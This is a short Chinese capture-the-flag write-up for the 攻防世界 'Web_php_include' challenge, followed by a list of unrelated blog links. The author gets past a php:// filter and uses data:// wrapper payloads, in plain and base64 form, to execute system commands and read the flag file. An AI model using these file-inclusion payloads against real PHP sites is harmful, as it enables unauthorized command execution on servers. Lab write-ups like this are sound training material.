攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
羸弱的穷酸书生几秒前
国网 i1协议 python实现
开发语言·python
电子硬件笔记2 分钟前
Python语言编程导论第三章 编写程序
开发语言·python·编辑器
布谷歌2 分钟前
在java中实现c#的int.TryParse方法
java·开发语言·python·c#
cooldream20097 分钟前
当代 C++ 的三大技术支柱:资源管理、泛型编程与模块化体系的成熟演进
开发语言·c++
洲星河ZXH24 分钟前
Java,集合框架体系
开发语言·windows
宠..29 分钟前
写一个感染型病毒
开发语言·安全·安全性测试
wheelmouse778829 分钟前
一个优雅、通用、零侵入的 CSV 导出工具类(Java 实战)
java·开发语言
cike_y1 小时前
JavaWeb-Request应用与Cookie&[特殊字符]️Session
java·开发语言·安全·java安全
胡萝卜3.01 小时前
深入C++可调用对象:从function包装到bind参数适配的技术实现
开发语言·c++·人工智能·机器学习·bind·function·包装器